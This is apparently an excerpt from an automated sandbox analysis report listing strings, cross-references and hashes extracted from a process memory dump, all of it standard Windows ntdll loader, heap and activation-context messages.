                                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                              Strings
                                                                                                              • VerifierFlags, xrefs: 017B8C50
                                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 017B8A67
                                                                                                              • HandleTraces, xrefs: 017B8C8F
                                                                                                              • VerifierDlls, xrefs: 017B8CBD
                                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 017B8A3D
                                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 017B8B8F
                                                                                                              • VerifierDebug, xrefs: 017B8CA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                              Strings
                                                                                                              • apphelp.dll, xrefs: 01726496
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01789A11, 01789A3A
                                                                                                              • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017899ED
                                                                                                              • Getting the shim user exports failed with status 0x%08lx, xrefs: 01789A01
                                                                                                              • LdrpInitShimEngine, xrefs: 017899F4, 01789A07, 01789A30
                                                                                                              • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01789A2A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-204845295
                                                                                                              • Opcode ID: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
                                                                                                              • Instruction ID: aaded4cd8ebf95b62906e12fcb1336a6a7226f7f3a9f360181f9126fa65daa63
                                                                                                              • Opcode Fuzzy Hash: 57adc82f201b1385c3a0b8ef4c8e3a8f7b4dd2c4cd909c74dbfbd199d85c4339
                                                                                                              • Instruction Fuzzy Hash: 8F51C1712583049FD721EF28C895BABF7E4FB84648F10492EFA8597155E730EA05CB93
                                                                                                              Strings
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 017A2178
                                                                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 017A219F
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 017A2165
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017A21BF
                                                                                                              • RtlGetAssemblyStorageRoot, xrefs: 017A2160, 017A219A, 017A21BA
                                                                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 017A2180
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                              • API String ID: 0-861424205
                                                                                                              • Opcode ID: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                                                                                                              • Instruction ID: b56229ad1adb29513a23d60a7e253524e0c70a4a10fbc675dd691000ea439c95
                                                                                                              • Opcode Fuzzy Hash: 324a2fc34d002b66213e2d6382cd2c21a04e40e42f3317bfee276c80a0ce3957
                                                                                                              • Instruction Fuzzy Hash: 21313576B80215B7E7258A9DCC85F9AFA6CDBA4A40F054169FF04B7146D270AE00C7A1
                                                                                                              Strings
                                                                                                              • LdrpInitializeProcess, xrefs: 0176C6C4
                                                                                                              • Loading import redirection DLL: '%wZ', xrefs: 017A8170
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0176C6C3
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017A8181, 017A81F5
                                                                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 017A81E5
                                                                                                              • LdrpInitializeImportRedirection, xrefs: 017A8177, 017A81EB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-475462383
                                                                                                              • Opcode ID: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
                                                                                                              • Instruction ID: 9e3f194c11cada4fe2155a87bba23375d60763d850e249dc390ee8db20600dc1
                                                                                                              • Opcode Fuzzy Hash: d247db0c293dfefba4d86714e4952be876a67782141c11f7cfacb1085eb4a43d
                                                                                                              • Instruction Fuzzy Hash: C23106B16443429FD325EF28D859E2AF7E4AF94B10F00055CFD815B299D660ED04CBA2
                                                                                                              APIs
                                                                                                                • Part of subcall function 01772DF0: LdrInitializeThunk.NTDLL ref: 01772DFA
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BA3
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770BB6
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D60
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01770D74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 1404860816-0
                                                                                                              • Opcode ID: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                                                                                                              • Instruction ID: 294aec694b496bb388cb65d9927a39ad470499d1fe9ee1a2d8527e6ab75bad3b
                                                                                                              • Opcode Fuzzy Hash: 54e30a67be4bb3bf21625dc410c678ba191004ae45da9e2e5c8597e5ba0e8158
                                                                                                              • Instruction Fuzzy Hash: A6427C71900715DFDB21CF28C884BAAB7F4FF49304F1445AAEA89DB245E770AA84CF61
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                              • API String ID: 0-379654539
                                                                                                              • Opcode ID: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                                                                                                              • Instruction ID: 204b753e69195aad9da9ea3a1843ca08d0e71c61dc3572be8246aa6abc2507a0
                                                                                                              • Opcode Fuzzy Hash: 9428beb9232e44f36038252b4cfa400e2493c3e7c943f4ffe5e0fe9c2600a709
                                                                                                              • Instruction Fuzzy Hash: 8CC15674108382DFDB11DF58C045B6AFBE4AF95704F0489AAF9D6CB292E734CA49CB52
                                                                                                              Strings
                                                                                                              • LdrpInitializeProcess, xrefs: 01768422
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01768421
                                                                                                              • @, xrefs: 01768591
                                                                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0176855E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1918872054
                                                                                                              • Opcode ID: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                                                                                                              • Instruction ID: 155a98c67026559d5ed83f444e3bd933b13a9dad264448ecedae1ef35d44da62
                                                                                                              • Opcode Fuzzy Hash: 19d7fc730624691cca0b1c803f7521839232dd3e5fcd66e3cca29017b00c067e
                                                                                                              • Instruction Fuzzy Hash: 089189B1508345AFDB22DF25CC44FBBFAECEB84744F80092EFA8496156E734D9048B62
                                                                                                              Strings
                                                                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017A22B6
                                                                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017A21D9, 017A22B1
                                                                                                              • SXS: %s() passed the empty activation context, xrefs: 017A21DE
                                                                                                              • .Local, xrefs: 017628D8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                              • API String ID: 0-1239276146
                                                                                                              • Opcode ID: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                                                                                                              • Instruction ID: 299935536e5a70445eaf632474a6d78ec26c5875d90e59543aa934c348074875
                                                                                                              • Opcode Fuzzy Hash: ca921221edd4ff7072300fc0381c1c1c925bc784735eba9d45f306bfab422e9e
                                                                                                              • Instruction Fuzzy Hash: 6FA1A03194422ADBDB65CF68CC88BA9F7B5BF98314F1541E9DD48A7292D7309E80CF90
                                                                                                              Strings
                                                                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 017A3437
                                                                                                              • RtlDeactivateActivationContext, xrefs: 017A3425, 017A3432, 017A3451
                                                                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 017A3456
                                                                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 017A342A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                              • API String ID: 0-1245972979
                                                                                                              • Opcode ID: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                                                                                                              • Instruction ID: a17cb9123b7041cec6de0c1789eec40e5e72f3faaab0ead6e59dc717738c260c
                                                                                                              • Opcode Fuzzy Hash: d318b21c381089decbdf8137aa1a8ff49b5529fb68daf47987c101f53f8f9ddf
                                                                                                              • Instruction Fuzzy Hash: 486111766007129BD726CF1CC885B3AF7E9FFC0B50F548669E95A9B245CB30E801CB91
                                                                                                              Strings
                                                                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01791028
                                                                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0179106B
                                                                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01790FE5
                                                                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017910AE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                              • API String ID: 0-1468400865
                                                                                                              • Opcode ID: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                                                                                                              • Instruction ID: edb1c165c01fbd6ee90b699cfc7afcae01eeb58de4fbdaa5f1c78e597994a378
                                                                                                              • Opcode Fuzzy Hash: 2d7cfb22c3b98c3a8776d061c68822ac8f53b0c144750329c149aeeca79b7474
                                                                                                              • Instruction Fuzzy Hash: DC71C4B1504305AFCB21DF18C888B9BBFA9EF94764F500468F9488B18BD734D689CBD2
                                                                                                              Strings
                                                                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 017A365C
                                                                                                              • LdrpFindDllActivationContext, xrefs: 017A3636, 017A3662
                                                                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 017A362F
                                                                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 017A3640, 017A366C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                              • API String ID: 0-3779518884
                                                                                                              • Opcode ID: 1eaf6589b4c5eecafba4e44806bcbfbd18c50111dff0164bf88bf13e0fc76afe
                                                                                                              • Instruction ID: 48c595cb2aa1289b330c720f766ea225031fca6ef4cb540b3512a0289e5b3643
                                                                                                              • Opcode Fuzzy Hash: 1eaf6589b4c5eecafba4e44806bcbfbd18c50111dff0164bf88bf13e0fc76afe
                                                                                                              • Instruction Fuzzy Hash: 65311772E00211AEEF36AE0CC859B39F6ACBB21754F06816AEF0657151D7A0DDC08BD5
                                                                                                              Strings
                                                                                                              • apphelp.dll, xrefs: 01752462
                                                                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0179A992
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0179A9A2
                                                                                                              • LdrpDynamicShimModule, xrefs: 0179A998
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-176724104
                                                                                                              Strings
                                                                                                              • HEAP[%wZ]: , xrefs: 01743255
                                                                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0174327D
                                                                                                              • HEAP: , xrefs: 01743264
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                              • API String ID: 0-617086771
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-4253913091
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $@
                                                                                                              • API String ID: 0-1077428164
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                                                                              • API String ID: 0-2779062949
                                                                                                              Strings
                                                                                                              • LdrpCheckModule, xrefs: 0179A117
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 0179A121
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 0179A10F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017A82E8
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 017A82DE
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 017A82D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              Strings
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 017EC1C5
                                                                                                              • @, xrefs: 017EC1F1
                                                                                                              • PreferredUILanguages, xrefs: 017EC212
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              Strings
                                                                                                              • LdrpCheckRedirection, xrefs: 017B488F
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 017B4899
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 017B4888
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              Strings
                                                                                                              • LdrpInitializationFailure, xrefs: 017B20FA
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 017B2104
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 017B20F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000006.00000002.2499450308.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_6_2_1700000_BalphRTkPS.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              Strings
